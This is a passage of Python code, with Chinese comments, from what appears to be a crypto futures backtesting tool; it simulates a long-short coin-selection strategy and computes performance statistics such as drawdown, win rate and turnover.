np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 1],\n symbol_info[:, 4]))\n # 记录月化换手率 和 K线结束持仓状态\n monthly_turnover_rate = np.nansum(np.abs(symbol_info[:, 5])) / all_trade_usdt / 2 * 24 * 30.4\n\n return symbol_info, monthly_turnover_rate\n\n\ndef trade_symbol_info_stop_offset(run_time, all_trade_usdt, symbol_info, offset_symbol_info, select_long_, select_short_, min_qtys, open_prices,\n close_prices, c_rate, hold_hour_num, long_coin_num, short_coin_num, offset_black_list, offset_stop_win, offset_stop_loss):\n next_run_time = run_time + 1\n # 计算实际下单量\n target_amount_long = select_long_[:, 3] / select_long_[:, 1]\n target_amount_short = -select_short_[:, 3] / select_short_[:, 1]\n\n for offset in range(hold_hour_num):\n offset_time = run_time - hold_hour_num + 1\n if offset_time in offset_black_list:\n continue\n offset_symbol_info[:, 11] = 0\n offset_symbol_info[:, 1] = 0\n 
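# column 2 (target quantity) is cleared as well, so each offset's mini-book is rebuilt from scratch\n 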
offset_symbol_info[:, 2] = 0\n for i in range(offset * long_coin_num, (offset + 1) * long_coin_num):\n symbol = int(select_long_[i, 0])\n offset_symbol_info[symbol, 2] += target_amount_long[i]\n offset_symbol_info[symbol, 1] = select_long_[i, 1]\n for i in range(offset * short_coin_num, (offset + 1) * short_coin_num):\n symbol = int(select_short_[i, 0])\n offset_symbol_info[symbol, 2] += target_amount_short[i]\n offset_symbol_info[symbol, 1] = select_short_[i, 1]\n offset_symbol_info[:, 11] = close_prices[run_time]\n offset_profit = np.nansum((offset_symbol_info[:, 11] - offset_symbol_info[:, 1]) * offset_symbol_info[:, 2])\n offset_cap = np.nansum(np.abs(offset_symbol_info[:, 1] * offset_symbol_info[:, 2]))\n offset_ret = offset_profit / offset_cap\n if offset_ret >= offset_stop_win or offset_ret <= offset_stop_loss:\n offset_black_list.append(offset_time)\n log.info(f'offset: {offset_time}触发提前中止, 当前offset收益率: {round(offset_ret,3)},止盈阈值: {offset_stop_win}, 止损阈值: {offset_stop_loss}')\n else:\n symbol_info[:, 2] += offset_symbol_info[:, 2]\n\n symbol_info[:, 3] = symbol_info[:, 2] - symbol_info[:, 0]\n # 下单量精度修正\n for symbol in range(symbol_info.shape[0]):\n min_qty = min_qtys[symbol]\n symbol_info[symbol, 3] = np.round(symbol_info[symbol, 3] * (10 ** min_qty)) / (10 ** min_qty)\n symbol_info[:, 11] = close_prices[run_time]\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n # 处理小于5 和reduce_only 问题\n symbol_info[:, 3] = np.where((np.abs(symbol_info[:, 5]) < 5) & (symbol_info[:, 2] != 0), 0, symbol_info[:, 3])\n symbol_info[:, 5] = symbol_info[:, 3] * symbol_info[:, 11]\n\n # K线开始,交易对持仓账户影响\n symbol_info[:, 4] = open_prices[run_time]\n symbol_info[:, 3] = np.where(np.isnan(symbol_info[:, 3]), 0, symbol_info[:, 3])\n symbol_info[:, 4] = np.where(np.isnan(symbol_info[:, 4]), 0, symbol_info[:, 4])\n symbol_info[:, 6] = symbol_info[:, 4] * np.abs(symbol_info[:, 3]) * c_rate\n symbol_info[:, 7] = np.where(symbol_info[:, 0] > symbol_info[:, 3], symbol_info[:, 3], symbol_info[:, 0])\n\n symbol_info[:, 7] = np.where(np.sign(symbol_info[:, 0]) == np.sign(symbol_info[:, 3]), 0,\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 3],\n symbol_info[:, 0]))\n\n symbol_info[:, 8] = symbol_info[:, 0] + symbol_info[:, 3]\n\n symbol_info[:, 9] = np.abs(symbol_info[:, 7]) * (symbol_info[:, 4] - symbol_info[:, 1]) * np.sign(symbol_info[:, 0])\n\n symbol_info[:, 10] = np.where(symbol_info[:, 7] == 0,\n (symbol_info[:, 1] * symbol_info[:, 0] + symbol_info[:, 3] * symbol_info[:, 4]) / (\n symbol_info[:, 0] + symbol_info[:, 3]),\n np.where(np.abs(symbol_info[:, 0]) > np.abs(symbol_info[:, 3]), symbol_info[:, 1],\n symbol_info[:, 4]))\n # 记录月化换手率 和 K线结束持仓状态\n monthly_turnover_rate = np.nansum(np.abs(symbol_info[:, 5])) / all_trade_usdt / 2 * 24 * 30.4\n\n return symbol_info, monthly_turnover_rate, offset_black_list\n\n\ndef update_symbol_info(run_time, symbol_info, close_prices):\n next_run_time = run_time + 1\n # K线结束,close对持仓账户影响\n symbol_info[:, 11] = close_prices[next_run_time]\n symbol_info[:, 12] = symbol_info[:, 8] * (symbol_info[:, 11] - symbol_info[:, 10])\n # 计算已实现盈亏 未实现盈亏 交易手续费\n totalRealizedProfit = np.nansum(symbol_info[:, 9])\n totalUnrealizedProfit = np.nansum(symbol_info[:, 12])\n commission = -np.nansum(symbol_info[:, 6])\n symbol_info_ = symbol_info.copy()\n\n symbol_info[:, 8] = np.where(np.abs(symbol_info[:, 8]) * symbol_info[:, 11] < 1, 0, symbol_info[:, 8])\n # K线结束 重置持仓账户\n symbol_info[:, 0] = symbol_info[:, 8]\n symbol_info[:, 1] = symbol_info[:, 
10]\n symbol_info[:, 2:] = 0\n symbol_info[:, 1] = np.where(np.isnan(symbol_info[:, 1]), 0, symbol_info[:, 1])\n return totalRealizedProfit, totalUnrealizedProfit, commission, symbol_info_, symbol_info\n\n\ndef timming_fun(signal_fun, curve, trade_ratio_limit=0.1):\n if signal_fun is None: return 1\n trade_ratio = signal_fun(curve)\n if abs(trade_ratio) < trade_ratio_limit:\n trade_ratio = np.sign(trade_ratio) * trade_ratio_limit\n return trade_ratio\n\n\ndef neutral_playback(playCfg, N, p_signal_fun, select_long, select_short, account, symbol_info, open_prices, close_prices, quit_arry, min_qtys, arr_data):\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n month_turnover_rate_list = []\n symbol_info_list = []\n offset_symbol_info = symbol_info.copy()\n offset_black_list = []\n\n ls_list = [[0., 0.]]\n hold_symbol_list = []\n quit_blacK_symbol_list = []\n account[0, 0] = initial_trade_usdt\n account[0, 1] = initial_trade_usdt\n account[0, 5] = np.inf\n curve = account[:, 0].copy()\n curve[0] = 1\n cache_data = [select_long, select_short]\n for run_time in range(N):\n next_run_time = run_time + 1\n curve_ = curve[:next_run_time]\n trade_ratio = timming_fun(p_signal_fun, curve_)\n all_trade_usdt = account[run_time, 0] * leverage * trade_ratio\n # 获取该时刻选币数据和多头风险暴露后的资金分配\n select_long_, select_short_ = get_select_data(playCfg, run_time, all_trade_usdt, arr_data, quit_blacK_symbol_list, cache_data=cache_data)\n long_coin_num_, short_coin_num_ = long_coin_num, short_coin_num\n if trade_ratio < 0:\n select_long_, select_short_ = select_short_, select_long_\n long_coin_num_, short_coin_num_ = short_coin_num_, long_coin_num_\n # 退市币最后一根有效K强制清仓\n if len(arr_data) > 0:\n if len(quit_arry) > 0:\n clear_arr = quit_arry[quit_arry[:, 0] == run_time]\n if len(clear_arr) > 0:\n for quit_symbol in clear_arr[:, 1]:\n select_long_[:, 3] = np.where([select_long_[:, 0] == quit_symbol], 0, select_long_[:, 3])\n select_short_[:, 3] = np.where([select_short_[:, 0] == quit_symbol], 0, select_short_[:, 3])\n quit_blacK_symbol_list.append(quit_symbol)\n log.info(f'{quit_symbol} 即将下架,马上获取不到K线数据,执行清仓并拉入黑名单')\n if offset_stop_win == 0 and offset_stop_loss == 0:\n # 开盘交易 symbol_info\n symbol_info, monthly_turnover_rate = trade_symbol_info(run_time, all_trade_usdt, symbol_info, select_long_, select_short_, min_qtys, open_prices, close_prices, c_rate)\n else:\n # 带offset止盈止损 symbol_info\n symbol_info, monthly_turnover_rate, offset_black_list = trade_symbol_info_stop_offset(run_time, all_trade_usdt, symbol_info, offset_symbol_info, select_long_, select_short_, min_qtys, open_prices, close_prices, c_rate, hold_hour_num, long_coin_num_, short_coin_num_, offset_black_list, offset_stop_win, offset_stop_loss)\n\n month_turnover_rate_list.append(monthly_turnover_rate)\n\n # 任意时点更新 symbol_info\n totalRealizedProfit, totalUnrealizedProfit, commission, symbol_info_, symbol_info = update_symbol_info(run_time, symbol_info, close_prices)\n\n long_value = np.nansum(np.where(symbol_info_[:, 8] > 0, symbol_info_[:, 8] * symbol_info_[:, 11], 0))\n short_value = np.nansum(np.where(symbol_info_[:, 8] < 0, -symbol_info_[:, 8] * symbol_info_[:, 11], 0))\n\n ls_list.append([long_value, short_value])\n\n # 精度撞见退市修复\n symbol_info_[:, 11] = np.where((np.abs(symbol_info_[:, 8]) > 0) & np.isnan(symbol_info_[:, 11]), 0,\n symbol_info_[:, 11])\n symbol_info_[:, 8] = np.where(np.abs(symbol_info_[:, 8]) * symbol_info_[:, 
11] < 0.001 * all_trade_usdt, 0, symbol_info_[:, 8])\n symbol_info_list.append(symbol_info_)\n\n hold_symbol_list.append([np.argwhere((symbol_info_[:, 8] > 0))[:, 0], np.argwhere((symbol_info_[:, 8] < 0))[:, 0]])\n # 更新币安账户\n account[next_run_time, 2] = totalRealizedProfit\n account[next_run_time, 3] = totalUnrealizedProfit\n account[next_run_time, 4] = commission\n account[next_run_time, 0] = account[run_time, 0] + account[next_run_time, 2] + account[next_run_time, 4]\n account[next_run_time, 1] = account[next_run_time, 0] + account[next_run_time, 3]\n account[next_run_time, 5] = account[next_run_time, 1] / (np.abs(np.nansum((symbol_info_[:, 8] * symbol_info_[:, 11]))) + 1e-8)\n curve[next_run_time] = curve[run_time] * (1 + (account[next_run_time, 1] / account[run_time, 1] - 1) / leverage / trade_ratio)\n return account, month_turnover_rate_list, symbol_info_list, ls_list, hold_symbol_list\n\n\ndef cal_hourly_details(replace_symbol_to_int, time_index, i, data):\n symbol_info = pd.DataFrame(data, columns=['当前持仓量', '开仓价格', '目标下单量', '实际下单量', 'avg_price', '实际下单资金', '手续费', '已实现仓位',\n '交易后持仓量', '已实现盈亏', '新开仓价格', 'close', '未实现盈亏'],\n index=replace_symbol_to_int.keys())\n # 各小时持仓详情记录\n display_df = symbol_info[['交易后持仓量', 'close', '未实现盈亏', '开仓价格']]\n display_df = display_df[display_df['交易后持仓量'] != 0]\n\n display_df['direction'] = np.sign(display_df['交易后持仓量'])\n\n display_df['notional'] = (display_df['交易后持仓量'] * display_df['close']).abs()\n display_df['持仓均价'] = display_df['开仓价格'] # / np.abs(display_df['交易后持仓量'])\n\n # 持仓市值占比\n display_df['national_p'] = display_df['notional'] / display_df['notional'].sum()\n # 总市值盈亏贡献占比\n display_df['未实现盈亏_p'] = display_df['未实现盈亏'] / display_df['notional'].sum()\n # 盈亏贡献占比\n display_df.loc[display_df['未实现盈亏_p'] < 0, 'loss_profit_p'] = display_df.loc[display_df['未实现盈亏_p'] < 0, '未实现盈亏'] / \\\n display_df.loc[\n display_df['未实现盈亏_p'] < 0, '未实现盈亏'].sum()\n display_df.loc[display_df['未实现盈亏_p'] >= 0, 'win_profit_p'] = display_df.loc[display_df['未实现盈亏_p'] >= 0, '未实现盈亏'] / \\\n display_df.loc[\n display_df['未实现盈亏_p'] >= 0, '未实现盈亏'].sum()\n display_df['未实现盈亏_p'] = display_df['未实现盈亏_p'] / display_df['national_p']\n display_df['win_loss_distribute'] = display_df[['loss_profit_p', 'win_profit_p']].max(axis=1)\n # 持仓市值排序\n display_df['national_rank'] = display_df['national_p'].rank(ascending=False)\n display_df.index.name = 'symbol'\n\n display_df.sort_values('national_rank', inplace=True)\n\n display_df = display_df[\n ['交易后持仓量', 'direction', '持仓均价', 'close', 'notional', 'national_p', '未实现盈亏', '未实现盈亏_p', 'win_loss_distribute', 'national_rank']]\n\n display_df.columns = ['持仓数量', '持仓方向', '持仓均价', '币种现价', '持仓市值', '持仓市值占比%', '未实现盈亏', '未实现盈亏占市值比%', '盈利亏损贡献度%', '持仓市值排名']\n\n display_df[['持仓市值占比%', '未实现盈亏占市值比%', '盈利亏损贡献度%']] = display_df[['持仓市值占比%', '未实现盈亏占市值比%', '盈利亏损贡献度%']] * 100\n\n display_df[['持仓市值', '持仓市值占比%', '未实现盈亏', '未实现盈亏占市值比%', '盈利亏损贡献度%']] = display_df[\n ['持仓市值', '持仓市值占比%', '未实现盈亏', '未实现盈亏占市值比%', '盈利亏损贡献度%']].round(2)\n\n display_df['candle_begin_time'] = time_index[i + 1]\n display_df = display_df.reset_index()\n\n order_df = symbol_info[['当前持仓量', '实际下单量', 'avg_price']].reset_index()\n order_df.columns = ['symbol', '当前持仓量', '实际下单量', '理想开仓均价']\n order_df = order_df[order_df['实际下单量'] != 0]\n order_df['candle_begin_time'] = time_index[i] + datetime.timedelta(minutes=1)\n return display_df, order_df\n\n\ndef freestep_evaluate(ls_df, long_hold, short_hold, month_turnover_rate_list=[0], compound_name='策略评价'):\n # 计算统计指标\n month_turnover_rate = 
np.nanmean(month_turnover_rate_list)\n key = compound_name\n results = pd.DataFrame()\n curve = ls_df['资金曲线'].to_frame(compound_name)\n curve.index.name = 'candle_begin_time'\n curve_ = curve.copy()\n curve.reset_index(inplace=True)\n curve['本周期多空涨跌幅'] = curve[key].pct_change().fillna(0)\n # 累积净值\n results.loc[key, '累积净值'] = round(curve[key].iloc[-1], 3)\n # 计算当日之前的资金曲线的最高点\n curve['max2here'] = curve[key].expanding().max()\n # 计算到历史最高值到当日的跌幅,drawdown\n curve['dd2here'] = curve[key] / curve['max2here'] - 1\n # 计算最大回撤,以及最大回撤结束时间\n end_date, max_draw_down = tuple(curve.sort_values(by=['dd2here']).iloc[0][['candle_begin_time', 'dd2here']])\n # 计算最大回撤开始时间\n start_date = curve[curve['candle_begin_time'] <= end_date].sort_values(by=key, ascending=False).iloc[0][\n 'candle_begin_time']\n # 将无关的变量删除\n curve.drop(['max2here', 'dd2here'], axis=1, inplace=True)\n results.loc[key, '最大回撤'] = format(max_draw_down, '.2%')\n results.loc[key, '最大回撤开始时间'] = str(start_date)\n results.loc[key, '最大回撤结束时间'] = str(end_date)\n # ===统计每个周期\n results.loc[key, '盈利周期数'] = len(curve.loc[curve['本周期多空涨跌幅'] > 0]) # 盈利笔数\n results.loc[key, '亏损周期数'] = len(curve.loc[curve['本周期多空涨跌幅'] <= 0]) # 亏损笔数\n results.loc[key, '胜率'] = format(results.loc[key, '盈利周期数'] / (len(curve) + eps), '.2%') # 胜率\n results.loc[key, '每周期平均收益'] = format(curve['本周期多空涨跌幅'].mean(), '.3%') # 每笔交易平均盈亏\n if curve.loc[curve['本周期多空涨跌幅'] <= 0]['本周期多空涨跌幅'].mean() != 0:\n results.loc[key, '盈亏收益比'] = round(curve.loc[curve['本周期多空涨跌幅'] > 0]['本周期多空涨跌幅'].mean() / \\\n curve.loc[curve['本周期多空涨跌幅'] <= 0]['本周期多空涨跌幅'].mean() * (-1), 2) # 盈亏比\n else:\n results.loc[key, '盈亏收益比'] = np.nan\n results.loc[key, '单周期最大盈利'] = format(curve['本周期多空涨跌幅'].max(), '.2%') # 单笔最大盈利\n results.loc[key, '单周期大亏损'] = format(curve['本周期多空涨跌幅'].min(), '.2%') # 单笔最大亏损\n # ===连续盈利亏损\n results.loc[key, '最大连续盈利周期数'] = max(\n [len(list(v)) for k, v in itertools.groupby(np.where(curve['本周期多空涨跌幅'] > 0, 1, np.nan))]) # 最大连续盈利次数\n results.loc[key, '最大连续亏损周期数'] = max(\n [len(list(v)) for k, v in itertools.groupby(np.where(curve['本周期多空涨跌幅'] <= 0, 1, np.nan))]) # 最大连续亏损次数\n results.loc[key, '月换手率'] = month_turnover_rate\n # ===每年、每月收益率\n curve.set_index('candle_begin_time', inplace=True)\n # year_return = curve[['本周期多空涨跌幅']].resample(rule='A').apply(lambda x: (1 + x).prod() - 1)\n # month_return = curve[['本周期多空涨跌幅']].resample(rule='M').apply(lambda x: (1 + x).prod() - 1)\n # year_return.columns=[key]\n # month_return.columns=[key]\n\n # 计算相对年化 最大回撤 信息系数 波动率\n result_stats = pd.DataFrame(index=['年化收益', '月化收益', '月信息比', '月化波动'],\n columns=curve_.columns)\n result_stats.loc['年化收益'][:] = np.power(curve_.iloc[-1], 365 * 24 / (curve_.shape[0] - 1)) - 1\n result_stats.loc['月化收益'][:] = np.power(curve_.iloc[-1], 30.4 * 24 / (curve_.shape[0] - 1)) - 1\n result_stats.loc['月化波动'][:] = curve_.pct_change().dropna().apply(lambda x: x.std() * np.sqrt(30.5 * 24))\n result_stats.loc['月信息比'][:] = (result_stats.loc['月化收益'][:] / (result_stats.loc['月化波动'][:] + eps))\n result_stats = result_stats.astype('float32').round(3)\n\n data = multi_list_merge([result_stats.T, results])\n data['月化收益回撤比'] = data['月化收益'] / (abs(data['最大回撤'].str[:-1].astype('float32')) + eps) * 100\n\n data = data[['累积净值', '年化收益', '月化收益', '月信息比', '月化波动', '月换手率', '月化收益回撤比', '最大回撤', '最大回撤开始时间', '最大回撤结束时间', '盈利周期数',\n '亏损周期数', '胜率', '每周期平均收益', '盈亏收益比', '单周期最大盈利', '单周期大亏损', '最大连续盈利周期数',\n '最大连续亏损周期数']]\n\n curve = ls_df[['资金曲线', '多头占比', '空头占比']]\n\n curve['long_hold_symbol'] = ' '\n curve['short_hold_symbol'] = ' '\n\n curve['long_hold_symbol'].iloc[1:] = 
long_hold.values\n curve['short_hold_symbol'].iloc[1:] = short_hold.values\n return data, curve\n\n\ndef neutral_strategy_playback(\n playCfg,\n p_signal_fun,\n start_date,\n end_date,\n symbols_data,\n arr_data,\n quit_arry,\n all_symbol_list,\n replace_symbol_to_int,\n replace_symbol_to_int_,\n select_long,\n select_short,\n compound_name='中性回放',\n min_marginRatio=0.01,\n hourly_details=False):\n # 载入配置\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n\n # 读取币种精度数据\n min_qty_df = pd.read_csv(min_qty_path, encoding='gbk')\n min_qty_df['合约'] = min_qty_df['合约'].str.replace('-', '')\n min_qty_df = pd.DataFrame(\n all_symbol_list,\n columns=['合约']).merge(\n min_qty_df,\n on=['合约'],\n how='left')\n min_qty_df['最小下单量'].fillna(min_qty_df['最小下单量'].min(), inplace=True)\n min_qty_df['最小下单量'] = min_qty_df['最小下单量'].apply(\n lambda x: int(math.log(float(x), 0.1)))\n min_qtys = min_qty_df['最小下单量'].to_numpy(dtype=np.float64)\n\n time_index = pd.date_range(\n start=start_date,\n end=end_date +\n datetime.timedelta(\n hours=1),\n freq='1H')\n # op cl 数据转换 为numpy\n open_price_df = symbols_data.pivot_table(\n index=['candle_begin_time'],\n columns=['symbol'],\n values=['avg_price'])\n close_price_df = symbols_data.pivot_table(\n index=['candle_begin_time'],\n columns=['symbol'],\n values=['close'])\n open_price_df = open_price_df.loc[start_date:end_date]\n close_price_df = close_price_df.loc[start_date - datetime.timedelta(hours=1):end_date]\n # 和内部规则恰好一致\n # open_price_df = open_price_df.rename(columns=replace_symbol_to_int)\n # close_price_df = close_price_df.rename(columns=replace_symbol_to_int)\n open_prices = open_price_df.to_numpy(dtype=np.float64)\n close_prices = close_price_df.to_numpy(dtype=np.float64)\n\n N = pd.date_range(start=start_date, end=end_date, freq='1H').shape[0]\n # 初始化 币安钱包账户\n account = np.zeros((N + 1, 6), dtype=np.float64)\n # 初始化 合约持仓账户\n symbol_info = np.zeros((len(all_symbol_list), 13), dtype=np.float64)\n # 选币模式\n account, month_turnover_rate_list, symbol_info_list, ls_list, hold_symbol_list = neutral_playback(playCfg, N, p_signal_fun, select_long, select_short, account, symbol_info, open_prices, close_prices, quit_arry, min_qtys, arr_data)\n account_df = pd.DataFrame(\n account,\n index=time_index,\n columns=[\n 'totalWalletBalance',\n 'totalMarginBalance',\n 'totalRealizedProfit',\n 'totalUnRealizedProfit',\n 'commission',\n 'marginRatio'])\n # 爆仓处理 min_marginRatio = 0.01\n if account_df['marginRatio'].min() < min_marginRatio:\n temp = account_df['marginRatio'].min()\n log.warning(f'保证金比例: {temp} 小于 {min_marginRatio},恭喜您爆仓了!')\n ind = account_df[account_df['marginRatio'] < min_marginRatio].index[0]\n account_df.loc[ind:, ['totalWalletBalance', 'totalMarginBalance']] = 1e-8\n df = pd.DataFrame([] + [x[0] for x in hold_symbol_list])\n df = df.replace(replace_symbol_to_int_)\n df.fillna('', inplace=True)\n df = df + ' '\n if df.shape[1] == 0:\n df[0] = ''\n long_hold = df[0]\n else:\n long_hold = df.sum(axis=1).str.strip()\n df = pd.DataFrame([] + [x[1] for x in hold_symbol_list])\n df = df.replace(replace_symbol_to_int_)\n df.fillna('', inplace=True)\n df = df + ' '\n if df.shape[1] == 0:\n df[0] = ''\n short_hold = df[0]\n else:\n short_hold = df.sum(axis=1).str.strip()\n\n if hourly_details:\n res_list = Parallel(\n n_jobs=-2,\n verbose=0)(\n delayed(cal_hourly_details)(\n replace_symbol_to_int,\n time_index,\n i,\n data) for i,\n data in 
enumerate(symbol_info_list))\n display_list = [x[0] for x in res_list]\n order_df_list = [x[1] for x in res_list]\n display_df = pd.concat(display_list)\n display_df = display_df.rename(columns={'candle_begin_time': 'display_time'})\n display_df = display_df.set_index(['display_time', 'symbol'])\n # display_df = display_df[display_df['持仓市值'] >= 1]\n order_df = pd.concat(order_df_list)\n order_df = order_df.rename(columns={'candle_begin_time': 'trade_time'})\n\n order_df = order_df.set_index(['trade_time', 'symbol'])\n else:\n display_df = pd.DataFrame()\n order_df = pd.DataFrame()\n\n ls_df = pd.DataFrame((np.array(ls_list).transpose(\n ) / account[:, 1]).transpose(), columns=['多头占比', '空头占比'], index=time_index).round(4)\n\n ls_df['资金曲线'] = account_df['totalMarginBalance'] / \\\n account_df['totalMarginBalance'].iloc[0]\n # 策略评价\n res, curve = freestep_evaluate(ls_df, long_hold, short_hold,\n month_turnover_rate_list=month_turnover_rate_list, compound_name=compound_name)\n cmmmission_loss = (1 - account_df['commission'] / account_df['totalMarginBalance']).cumprod().iloc[-1] - 1\n\n res['交易费率'] = c_rate * 10000\n res['leverage'] = leverage\n res['手续费磨损净值'] = cmmmission_loss * res['累积净值'].iloc[0]\n final_trade_usdt = round(account_df.iloc[-1]['totalMarginBalance'], 2)\n cmmmission_sum = round(account_df['commission'].sum(), 2)\n # 取出需要调整顺序的列数据'D'\n d = res.pop('手续费磨损净值')\n # 利用insert方法插入取出的数据列到指定位置\n res.insert(1, '手续费磨损净值', d)\n log.info(f'初始投入资产: {initial_trade_usdt} U,最终账户资产: {final_trade_usdt} U, 共支付手续费: {-cmmmission_sum} U')\n account_df.index = account_df.index - datetime.timedelta(hours=1)\n curve.index = curve.index - datetime.timedelta(hours=1)\n return res, curve, account_df, display_df, order_df\n\n\ndef multi_list_merge(df_list, on=None, how='inner'):\n if len(df_list) == 1:\n return df_list[0]\n if on == None:\n for i in range(len(df_list) - 1):\n if i == 0:\n merge_df = pd.merge(df_list[0], df_list[1], left_index=True, right_index=True, how=how)\n else:\n merge_df = merge_df.merge(df_list[i + 1], left_index=True, right_index=True, how=how)\n else:\n for i in range(len(df_list) - 1):\n if i == 0:\n merge_df = pd.merge(df_list[0], df_list[1], on=on, how=how)\n else:\n merge_df = merge_df.merge(df_list[i + 1], on=on, how=how)\n return merge_df\n\n\ndef w_log(p, coins_num):\n array = np.arange(1, coins_num + 1)\n if p > 0:\n array = np.log(array + p)\n else:\n array = np.full(coins_num, 1)\n weight_array = array[::-1] / array.sum()\n return weight_array\n\n\n# 横截面\ndef cal_factor_by_cross(df, factor_long_list, factor_short_list, pct_enable=False):\n feature_list = tools.convert_to_feature(factor_long_list + factor_short_list)\n # ===数据预处理\n df = df.set_index(['candle_begin_time', 'symbol']).sort_index()\n # 横截面排名\n df[feature_list] = df.groupby('candle_begin_time')[feature_list].apply(\n lambda x: x.rank(pct=pct_enable, ascending=True))\n df[feature_list] = df.groupby('candle_begin_time')[\n feature_list].apply(lambda x: x.fillna(x.median()))\n df.reset_index(inplace=True)\n\n df = tools.cal_factor_by_vertical(df, factor_long_list, factor_tag='多头因子')\n df = tools.cal_factor_by_vertical(df, factor_short_list, factor_tag='空头因子')\n\n return df\n\n\n# 纵截面\ndef cal_factor_by_vertical(df, factor_long_list, factor_short_list):\n\n '''纵截面数据处理更新'''\n feature_list = tools.convert_to_feature(factor_long_list + factor_short_list)\n # ===数据预处理\n df = df.set_index(['candle_begin_time', 'symbol']).sort_index()\n df[feature_list] = df.groupby('candle_begin_time')[\n feature_list].apply(lambda x: 
x.fillna(x.median()))\n df.reset_index(inplace=True)\n '''纵截面数据处理更新'''\n\n\n df = tools.cal_factor_by_vertical(df, factor_long_list, factor_tag='多头因子')\n df = tools.cal_factor_by_vertical(df, factor_short_list, factor_tag='空头因子')\n return df\n\n\n# np选币\ndef np_gen_selected(df, base_index, filter_before_exec, filter_after_exec, select_by_hour, playCfg, select_offsets, white_list, black_list, replace_symbol_to_int):\n import copy\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n\n df['weight'] = 0\n df['assign_usdt'] = 0\n df['weight_ratio'] = 1\n df['time'] = df['candle_begin_time'].copy()\n df['candle_begin_time'] = pd.to_numeric(df['candle_begin_time'])\n base_time = pd.to_numeric(pd.Series(pd.to_datetime('20170101'))).iloc[0]\n df['offset'] = (df['candle_begin_time'] - base_time) / 3.6e12 % hold_hour_num\n\n df1 = df.copy()\n df2 = df.copy()\n time_length = len(df['time'].unique())\n\n # 前置过滤\n # print(df1.groupby('time').size())\n # print(df2.groupby('time').size())\n # print(df1.groupby('time').size().min())\n\n\n df1, df2 = filter_before(df1, df2, filter_before_exec, white_list, black_list, replace_symbol_to_int)\n # print(df1.groupby('time').size())\n # print(df2.groupby('time').size())\n # print(df1.groupby('time').size().min())\n\n time_length1 = len(df1['time'].unique())\n time_length2 = len(df2['time'].unique())\n if time_length != np.mean([time_length1, time_length2]):\n log.warning('由于过滤因子异常或过滤条件苛刻,导致某些小时合约数量不够,进入容错选币算法,数量不够的小时将空仓,耗时很长。建议检查过滤条件,多空不平衡玩法可以在后置过滤完成')\n\n df1_miss = (set(df['time'].unique()) - set(df1['time'].unique()))\n df2_miss = (set(df['time'].unique()) - set(df2['time'].unique()))\n log.warning(f'多头缺失日期:{df1_miss}')\n log.warning(f'空头缺失日期:{df2_miss}')\n\n filter_miss = True\n else:\n filter_miss = False\n\n # 后置过滤前置化\n df1, df2 = filter_after(df1, df2, filter_after_exec)\n\n # 指定offset\n long_select_offset, short_select_offset = select_offsets\n if long_select_offset:\n df1.loc[df1['offset'].isin(long_select_offset), 'weight_ratio'] *= (hold_hour_num / len(long_select_offset))\n df1.loc[~df1['offset'].isin(long_select_offset), 'weight_ratio'] = 0\n if short_select_offset:\n df2.loc[df2['offset'].isin(short_select_offset), 'weight_ratio'] *= (hold_hour_num / len(short_select_offset))\n df2.loc[~df2['offset'].isin(short_select_offset), 'weight_ratio'] = 0\n\n # 权重计算\n long_weight_array = w_log(p=long_p, coins_num=long_coin_num)\n short_weight_array = w_log(p=short_p, coins_num=short_coin_num)\n arr1 = df1[['candle_begin_time', 'symbol', 'close', 'weight', 'assign_usdt', '多头因子', 'weight_ratio']].to_numpy(\n dtype='float64')\n arr2 = df2[['candle_begin_time', 'symbol', 'close', 'weight', 'assign_usdt', '空头因子', 'weight_ratio']].to_numpy(\n dtype='float64')\n\n arr = arr1.copy()\n arr = np.split(arr, np.unique(arr[:, 0], return_index=True)[1][1:])\n arr_list_long = copy.deepcopy(arr)\n ll = []\n for temp in arr:\n temp[:, 5] = temp[:, 5].argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= long_coin_num)])\n select_coin_long = np.vstack(ll)\n\n arr = arr2.copy()\n arr = np.split(arr, np.unique(arr[:, 0], return_index=True)[1][1:])\n arr_list_short = copy.deepcopy(arr)\n\n ll = []\n for temp in arr:\n temp[:, 5] = (-temp[:, 5]).argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= short_coin_num)])\n select_coin_short = np.vstack(ll)\n\n boll1 = select_coin_long.shape[0] != len(base_index) * long_coin_num\n boll2 
= select_coin_short.shape[0] != len(base_index) * short_coin_num\n if boll1 | boll2:\n if not filter_miss:\n log.warning('由于过滤后或日期范围内合约数量不够,进入容错选币算法,耗时很长')\n log.warning('建议选2币的起始日期在2020年1月10日之后,3币2月1日之后,10币3月3日之后')\n\n all_arr = df[['candle_begin_time', 'symbol', 'close', 'weight', 'assign_usdt', '空头因子', 'weight_ratio']].to_numpy(\n dtype='float64')\n arr_list_long = []\n arr_list_short = []\n ll_long = []\n ll_short = []\n for cat in np.unique(all_arr[:, 0]):\n long = arr1[arr1[:, 0] == cat]\n boll1 = long.shape[0] >= long_coin_num\n short = arr2[arr2[:, 0] == cat]\n boll2 = short.shape[0] >= short_coin_num\n if boll1 and boll2:\n arr_list_long.append(long.copy())\n arr_list_short.append(short.copy())\n long[:, 5] = long[:, 5].argsort().argsort() + 1\n long = long[np.where(long[:, 5] <= long_coin_num)]\n ll_long.append(long)\n short[:, 5] = (-short[:, 5]).argsort().argsort() + 1\n short = short[np.where(short[:, 5] <= short_coin_num)]\n ll_short.append(short)\n else:\n fillarr = all_arr[all_arr[:, 0] == cat]\n fillarr = np.vstack([fillarr[:long_coin_num], fillarr[:short_coin_num]])\n fillarr[:, 6] = 0\n arr_list_long.append(fillarr)\n arr_list_short.append(fillarr)\n ll_long.append(fillarr[:long_coin_num])\n ll_short.append(fillarr[:short_coin_num])\n\n select_coin_long = np.vstack(ll_long)\n select_coin_short = np.vstack(ll_short)\n\n boll1 = select_coin_long.shape[0] == len(base_index) * long_coin_num\n boll2 = select_coin_short.shape[0] 